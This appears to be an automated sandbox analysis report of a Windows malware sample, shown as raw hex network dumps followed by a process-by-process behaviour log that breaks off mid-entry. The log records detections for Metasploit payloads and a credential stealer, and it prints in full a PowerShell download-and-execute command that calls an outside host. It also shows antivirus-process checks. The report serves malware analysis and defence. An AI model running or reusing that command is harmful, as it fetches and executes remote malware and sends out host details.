                                                                                                                  2024-12-29 07:56:13 UTC1369INData Raw: 65 6c 66 02 00 02 9c 10 40 00 02 00 05 41 46 6c 61 67 02 00 02 b8 12 40 00 08 00 05 41 44 61 74 61 02 00 02 00 00 5c 23 40 00 07 0f 48 50 50 47 45 4e 41 74 74 72 69 62 75 74 65 b8 22 40 00 34 20 40 00 00 00 06 53 79 73 74 65 6d 00 00 00 00 02 00 00 00 00 00 8c 23 40 00 14 08 50 4d 6f 6e 69 74 6f 72 8c 24 40 00 02 00 a0 23 40 00 14 17 54 4d 6f 6e 69 74 6f 72 2e 50 57 61 69 74 69 6e 67 54 68 72 65 61 64 c0 23 40 00 02 00 00 c4 23 40 00 0e 17 54 4d 6f 6e 69 74 6f 72 2e 54 57 61 69 74 69 6e 67 54 68 72 65 61 64 0c 00 00 00 00 00 00 00 00 03 00 00 00 9c 23 40 00 00 00 00 00 02 04 4e 65 78 74 02 00 e4 10 40 00 04 00 00 00 02 06 54 68 72 65 61 64 02 00 00 11 40 00 08 00 00 00 02 09 57 61 69 74 45 76 65 6e 74 02 00 02 00 00 00 00 00 00 2c 24 40 00 0e 12 54 4d 6f
                                                                                                                  Data Ascii: elf@AFlag@AData\#@HPPGENAttribute"@4 @System#@PMonitor$@#@TMonitor.PWaitingThread#@#@TMonitor.TWaitingThread#@Next@Thread@WaitEvent,$@TMo
                                                                                                                  2024-12-29 07:56:13 UTC1369INData Raw: 66 74 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 ec f1 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 2b 00 00 f2 40 00 0b 4e 65 77 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 01 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 14 29 40 00 07 11 54 49 6e 74 65 72 66 61 63 65 64 4f 62 6a 65 63 74 2c 28 40 00 9c 1f 40 00 00 00 06 53 79 73 74 65 6d 00 00 01 00 02 47 29 40 00 02 00 02 00 00 00 9c 10 40 00 d4 f1 40 00 00 00 00 00 01 00 00 00 00 00 00 80 00 00 00 80 ff ff 08 52 65 66 43 6f 75 6e 74 00 00 cc 83 44 24 04 fc e9 21 c9 00 00 83 44 24 04 fc e9 3f c9 00 00 83 44 24 04 fc e9 41 c9 00
                                                                                                                  Data Ascii: fterConstruction)@Self1@BeforeDestruction)@Self+@NewInstance@Self)@TInterfacedObject,(@@SystemG)@@@RefCountD$!D$?D$A
                                                                                                                  2024-12-29 07:56:13 UTC1369INData Raw: 40 00 08 00 00 00 02 08 56 42 6f 6f 6c 65 61 6e 02 00 00 11 40 00 08 00 00 00 02 08 56 55 6e 6b 6e 6f 77 6e 02 00 64 10 40 00 08 00 00 00 02 09 56 53 68 6f 72 74 49 6e 74 02 00 b4 10 40 00 08 00 00 00 02 05 56 42 79 74 65 02 00 cc 10 40 00 08 00 00 00 02 05 56 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 09 56 4c 6f 6e 67 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 07 56 55 49 6e 74 33 32 02 00 14 11 40 00 08 00 00 00 02 06 56 49 6e 74 36 34 02 00 34 11 40 00 08 00 00 00 02 07 56 55 49 6e 74 36 34 02 00 00 11 40 00 08 00 00 00 02 07 56 53 74 72 69 6e 67 02 00 00 11 40 00 08 00 00 00 02 04 56 41 6e 79 02 00 d4 2b 40 00 08 00 00 00 02 06 56 41 72 72 61 79 02 00 00 11 40 00 08 00 00 00 02 08 56 50 6f 69 6e 74 65 72 02 00 00 11 40 00 08 00 00 00 02 08 56 55
                                                                                                                  Data Ascii: @VBoolean@VUnknownd@VShortInt@VByte@VWord@VLongWord@VUInt32@VInt644@VUInt64@VString@VAny+@VArray@VPointer@VU
                                                                                                                  2024-12-29 07:56:13 UTC1369INData Raw: 35 40 00 08 00 00 00 24 17 40 00 f8 7e 40 00 00 7f 40 00 f0 80 40 00 e8 80 40 00 08 81 40 00 0c 81 40 00 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 d8 7d 40 00 00 00 43 00 9b 35 40 00 44 00 f4 ff c1 35 40 00 41 00 f4 ff e6 35 40 00 41 00 f4 ff 0c 36 40 00 41 00 f4 ff 34 36 40 00 41 00 f4 ff 62 36 40 00 41 00 f4 ff 90 36 40 00 43 00 f4 ff c6 36 40 00 43 00 f4 ff 11 37 40 00 43 00 f4 ff 45 37 40 00 43 00 f4 ff a7 37 40 00 43 00 f4 ff 09 38 40 00 43 00 f4 ff 6b 38 40 00 43 00 f4 ff cd 38 40 00 43 00 f4 ff 2f 39 40 00 43 00 f4 ff 91 39 40 00 43 00 f4 ff f3 39 40 00 43 00 f4 ff 55 3a 40 00 43 00 f4 ff b7 3a 40 00 43 00 f4 ff 19 3b 40 00 43 00 f4 ff 7b 3b 40 00 43 00 f4 ff dd 3b 40 00 43 00 f4 ff 3f 3c 40 00 43 00 f4 ff a1 3c 40 00 43 00 f4 ff 03 3d 40 00
                                                                                                                  Data Ascii: 5@$@~@@@@@@@@}@}@}@C5@D5@A5@A6@A46@Ab6@A6@C6@C7@CE7@C7@C8@Ck8@C8@C/9@C9@C9@CU:@C:@C;@C{;@C;@C?<@C<@C=@
                                                                                                                  2024-12-29 07:56:13 UTC1369INData Raw: 72 63 02 00 01 04 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 3c 4c 40 00 01 00 03 53 72 63 02 00 00 9c 10 40 00 02 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 08 32 40 00 0c 00 04 44 65 73 74 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 08 32 40 00 01 00 03 53 72 63 02 00 01 3c 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c
                                                                                                                  Data Ascii: rcL@Dest@StartIndex@Countb(JCopySelf<L@Src@StartIndex2@Dest@Countb(JCopySelf2@Src<L@Dest@StartIndex@Countb(


                                                                                                                  Statistics

                                                                                                                  CPU Usage

                                                                                                                  Click to jump to process

                                                                                                                  Memory Usage

                                                                                                                  Click to jump to process

                                                                                                                  High Level Behavior Distribution

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Target ID:0
                                                                                                                  Start time:02:55:17
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Users\user\Desktop\MdhO83N5Fm.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\MdhO83N5Fm.exe"
                                                                                                                  Imagebase:0xce0000
                                                                                                                  File size:33'189'377 bytes
                                                                                                                  MD5 hash:9FED7135D164C0FB31B859FCD5ACFE5F
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000003.2259303619.000000000C31A000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                  • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2323177283.000000000C31A000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:3
                                                                                                                  Start time:02:55:40
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                  Imagebase:0xc60000
                                                                                                                  File size:231'736 bytes
                                                                                                                  MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2408545066.000000000053C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2407805185.000000000053C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2458797164.000000000053D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2364845669.000000000053B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2363683286.000000000052A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2363820686.000000000053B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2364785465.000000000052F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2407902307.000000000053C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2430904612.000000000053C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:5
                                                                                                                  Start time:02:56:09
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
                                                                                                                  Imagebase:0x970000
                                                                                                                  File size:433'152 bytes
                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:6
                                                                                                                  Start time:02:56:09
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:7
                                                                                                                  Start time:02:56:26
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exe"
                                                                                                                  Imagebase:0x620000
                                                                                                                  File size:8'767'044 bytes
                                                                                                                  MD5 hash:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:Borland Delphi
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 14%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:8
                                                                                                                  Start time:02:56:28
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmp
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmp" /SL5="$70296,7785838,845824,C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exe"
                                                                                                                  Imagebase:0x720000
                                                                                                                  File size:3'367'424 bytes
                                                                                                                  MD5 hash:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:Borland Delphi
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 3%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:9
                                                                                                                  Start time:02:56:29
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exe" /VERYSILENT
                                                                                                                  Imagebase:0x620000
                                                                                                                  File size:8'767'044 bytes
                                                                                                                  MD5 hash:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:Borland Delphi
                                                                                                                  Reputation:low
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:10
                                                                                                                  Start time:02:56:30
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmp
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmp" /SL5="$A005E,7785838,845824,C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exe" /VERYSILENT
                                                                                                                  Imagebase:0xc0000
                                                                                                                  File size:3'367'424 bytes
                                                                                                                  MD5 hash:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:Borland Delphi
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 3%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:11
                                                                                                                  Start time:02:56:57
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\timeout.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"timeout" 9
                                                                                                                  Imagebase:0x7ff64f110000
                                                                                                                  File size:32'768 bytes
                                                                                                                  MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:12
                                                                                                                  Start time:02:56:58
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:13
                                                                                                                  Start time:02:57:07
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
                                                                                                                  Imagebase:0x7ff7a3a70000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:14
                                                                                                                  Start time:02:57:07
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:15
                                                                                                                  Start time:02:57:07
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                                                                                                                  Imagebase:0x7ff6e2250000
                                                                                                                  File size:106'496 bytes
                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:16
                                                                                                                  Start time:02:57:07
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\find.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:find /I "wrsa.exe"
                                                                                                                  Imagebase:0x7ff79ffa0000
                                                                                                                  File size:17'920 bytes
                                                                                                                  MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:17
                                                                                                                  Start time:02:57:07
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
                                                                                                                  Imagebase:0x7ff7a3a70000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:18
                                                                                                                  Start time:02:57:07
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:19
                                                                                                                  Start time:02:57:07
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
                                                                                                                  Imagebase:0x7ff6e2250000
                                                                                                                  File size:106'496 bytes
                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:20
                                                                                                                  Start time:02:57:07
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\find.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:find /I "opssvc.exe"
                                                                                                                  Imagebase:0x7ff79ffa0000
                                                                                                                  File size:17'920 bytes
                                                                                                                  MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:21
                                                                                                                  Start time:02:57:07
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
                                                                                                                  Imagebase:0x7ff7a3a70000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:22
                                                                                                                  Start time:02:57:07
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:23
                                                                                                                  Start time:02:57:08
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
                                                                                                                  Imagebase:0x7ff6e2250000
                                                                                                                  File size:106'496 bytes
                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:24
                                                                                                                  Start time:02:57:08
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\find.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:find /I "avastui.exe"
                                                                                                                  Imagebase:0x7ff79ffa0000
                                                                                                                  File size:17'920 bytes
                                                                                                                  MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:25
                                                                                                                  Start time:02:57:08
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
                                                                                                                  Imagebase:0x7ff7a3a70000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:26
                                                                                                                  Start time:02:57:08
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:27
                                                                                                                  Start time:02:57:08
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
                                                                                                                  Imagebase:0x7ff6e2250000
                                                                                                                  File size:106'496 bytes
                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:28
                                                                                                                  Start time:02:57:08
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\find.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:find /I "avgui.exe"
                                                                                                                  Imagebase:0x7ff79ffa0000
                                                                                                                  File size:17'920 bytes
                                                                                                                  MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:29
                                                                                                                  Start time:02:57:08
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
                                                                                                                  Imagebase:0x7ff7a3a70000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:30
                                                                                                                  Start time:02:57:08
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:31
                                                                                                                  Start time:02:57:08
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                                                                                                                  Imagebase:0x7ff6e2250000
                                                                                                                  File size:106'496 bytes
                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:32
                                                                                                                  Start time:02:57:08
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\find.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:find /I "nswscsvc.exe"
                                                                                                                  Imagebase:0x7ff79ffa0000
                                                                                                                  File size:17'920 bytes
